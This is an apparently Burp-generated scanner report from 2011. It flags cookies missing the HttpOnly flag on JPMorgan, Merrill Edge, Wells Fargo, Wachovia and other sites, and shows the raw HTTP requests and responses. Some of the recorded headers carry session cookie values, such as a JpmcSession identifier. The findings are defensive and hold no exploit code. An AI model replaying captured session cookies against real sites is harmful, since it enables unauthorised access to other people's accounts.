GET /script/jquery.pngFix.pack.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACE_COOKIE=R2666079405; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:42 GMT Server: Apache Last-Modified: Fri, 08 Oct 2010 22:55:29 GMT ETag: "2bc00-9bf-e8325a40" Accept-Ranges: bytes Content-Length: 2495 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
/** * -------------------------------------------------------------------- * jQuery-Plugin "pngFix" * Version: 1.1, 11.09.2007 * by Andreas Eberhard, andreas.eberhard@gmail.com * ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/jquery_jpm_custom.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACE_COOKIE=R2666079405; JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:42 GMT Server: Apache Last-Modified: Tue, 19 Oct 2010 20:54:04 GMT ETag: "2cd45-3e2e-7e3b3300" Accept-Ranges: bytes Content-Length: 15918 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
// tabWidget custom class - Darren Andes jQuery.fn.tabWidget=function(divTabId,props){props=jQuery.extend({show:0},props?props:{});var _ref=this;this.divTabId=divTabId;this.items=jQuery(this).child ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/lightbox_support/builder.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:45 GMT Server: Apache Last-Modified: Thu, 15 Jul 2010 19:52:10 GMT ETag: "8e6f7-1288-70180e80" Accept-Ranges: bytes Content-Length: 4744 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
// script.aculo.us builder.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009
// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) // // script.aculo.us is freely distributabl ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/lightbox_support/controls.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:46 GMT Server: Apache Last-Modified: Thu, 15 Jul 2010 19:52:56 GMT ETag: "8e703-87e3-72d5f600" Accept-Ranges: bytes Content-Length: 34787 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
// script.aculo.us controls.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009
// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) // (c) 2005-2009 Ivan Krstic (htt ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/lightbox_support/dragdrop.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:46 GMT Server: Apache Last-Modified: Thu, 15 Jul 2010 19:52:45 GMT ETag: "8e704-7950-722e1d40" Accept-Ranges: bytes Content-Length: 31056 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
// script.aculo.us dragdrop.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009
// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) // // script.aculo.us is freely distributab ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/lightbox_support/effects.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:46 GMT Server: Apache Last-Modified: Thu, 15 Jul 2010 19:52:32 GMT ETag: "8e705-9647-7167c000" Accept-Ranges: bytes Content-Length: 38471 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
// script.aculo.us effects.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/lightbox_support/prototype.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:44 GMT Server: Apache Last-Modified: Thu, 15 Jul 2010 18:37:43 GMT ETag: "8e706-2224e-65d70bc0" Accept-Ranges: bytes Content-Length: 139854 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
/* Prototype JavaScript framework, version 1.6.1 * (c) 2005-2009 Sam Stephenson * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see the Prototype ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/lightbox_support/scriptaculous.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:44 GMT Server: Apache Last-Modified: Thu, 15 Jul 2010 18:38:24 GMT ETag: "8e707-b78-6848a800" Accept-Ranges: bytes Content-Length: 2936 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
// script.aculo.us scriptaculous.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009
// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) // // Permission is hereby granted, fr ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/lightbox_support/slider.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:46 GMT Server: Apache Last-Modified: Thu, 15 Jul 2010 19:53:09 GMT ETag: "8e708-27b2-739c5340" Accept-Ranges: bytes Content-Length: 10162 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
// script.aculo.us slider.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009
// Copyright (c) 2005-2009 Marty Haught, Thomas Fuchs // // script.aculo.us is freely distributable under the terms of an MIT-style ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/lightbox_support/sound.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:46 GMT Server: Apache Last-Modified: Thu, 15 Jul 2010 19:53:21 GMT ETag: "8e709-998-74536e40" Accept-Ranges: bytes Content-Length: 2456 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
// script.aculo.us sound.js v1.8.3, Thu Oct 08 11:23:33 +0200 2009
// Copyright (c) 2005-2009 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us) // // Based on code created by Jules Gravinese ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/lightview.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:44 GMT Server: Apache Last-Modified: Wed, 04 Aug 2010 00:45:05 GMT ETag: "2cd52-949f-bea16640" Accept-Ranges: bytes Content-Length: 38047 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
// Lightview 2.5.2.1 - 01-01-2010 // Copyright (c) 2008-2010 Nick Stakenburg (http://www.nickstakenburg.com) // // Licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /script/swfobject.js HTTP/1.1 Host: www.jpmorgan.com Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JpmcSession=khj7NJhLY0pJnGD45xgrXgyxV8vwf1lQLfRBdphGCLXFrzC6T7CB!-1882927501; __utmz=214076236.1296685845.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/20; __utma=214076236.119365949.1296685845.1296685845.1296685845.1; __utmc=214076236; __utmb=214076236.1.10.1296685845; ACE_COOKIE=R2666079405
Response
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Thu, 03-Feb-2011 22:50:16 GMT Date: Wed, 02 Feb 2011 22:29:45 GMT Server: Apache Last-Modified: Wed, 14 Nov 2007 17:03:46 GMT ETag: "2c723-1a42-8c6a0080" Accept-Ranges: bytes Content-Length: 6722 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Type: application/x-javascript
/** * SWFObject v1.4.4: Flash Player detection and embed - http://blog.deconcept.com/swfobject/ * * SWFObject is (c) 2006 Geoff Stearns and is released under the MIT License: * http://www.opensour ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /index.php HTTP/1.1 Host: www.learningsolutions.com.hk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /m/pages/self-directed-investing.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /m/pages/zero-dollar-trades.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /m/pages/home.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /m/pages/merrill-edge-advisory-center.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.myschedule.navyfederal.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Length: 15100 Content-Type: text/html Content-Location: http://www.myschedule.navyfederal.org/Default.htm Last-Modified: Wed, 07 Nov 2001 15:10:00 GMT Accept-Ranges: bytes ETag: "014cf449e67c11:5e8" X-Powered-By: ASP.NET Date: Wed, 02 Feb 2011 22:19:30 GMT Connection: close Set-Cookie: TS26bd7b=a65ecccc74731a368fe90c1afa57c1bee8233e9e4dea5aa14d49d874; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.omniture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: Omniture AWS/2.0.0 Location: http://www.omniture.com/en/ Content-Length: 313 Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 01:17:24 GMT Connection: close Set-Cookie: BIGipServerhttp_omniture=84542986.5892.0000; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.omniture.com ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy/ HTTP/1.1 Host: www.omniture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: Omniture AWS/2.0.0 Location: http://www.omniture.com/en/privacy/ Content-Length: 321 Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Wed, 02 Feb 2011 22:20:01 GMT Connection: close Set-Cookie: BIGipServerhttp_omniture=84542986.5892.0000; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.omniture.com ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.pnccardservicesonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:20:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: DefaultBrand=NatCityMain; expires=Thu, 02-Feb-2012 22:20:17 GMT; path=/; secure Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 12377
The following cookie was issued by the application and does not have the HttpOnly flag set:
NSC_xfcdmvtufs=dddbcc5b3660;Version=1;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /opinion/contributors/content/CT_nefish_01-11-11_ORLPT84_v8.4117508.html HTTP/1.1 Host: www.projo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:17:29 GMT Server: Apache/2.0.46 (Red Hat) Accept-Ranges: bytes Vary: Accept-Encoding Expires: now Cache-Control: no-cache,no-store,private,must-revalidate Pragma: no-cache P3P: policyref="http://ads.belointeractive.com/w3c/p3p.xml", CP="NOI DSP CUR ADMa DEVa TAIa OUR IND UNI COM NAV INT" Keep-Alive: timeout=600 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_xfcdmvtufs=dddbcc5b3660;Version=1;path=/ Content-Length: 75680
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:pas="http://www.projo.com/200 ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /IRA/pages/home.aspx HTTP/1.1 Host: www.retirement.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sonycard/ HTTP/1.1 Host: www.sony.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="https://www.sonyrewards ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /TotalMerrill/pages/home.aspx HTTP/1.1 Host: www.totalmerrill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /supported-bots/forum-posting-bots/ipboard-software HTTP/1.1 Host: www.universalbot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 23:45:21 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 07ea8e9c6c6b4815a2b15bba5c0035ed=f727505d493a98b8f369b1124d09e0d7; path=/ Last-Modified: Wed, 02 Feb 2011 23:45:22 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28822
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir= ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ust/pages/index.aspx HTTP/1.1 Host: www.ustrust.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.wachovia.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="https://www.wachovia.co ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/26551757/detail.html HTTP/1.1 Host: www.wcti12.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html class="no-js"> <head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1 ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
v1st=EF949CC12A6233AB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.wellsfargo.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
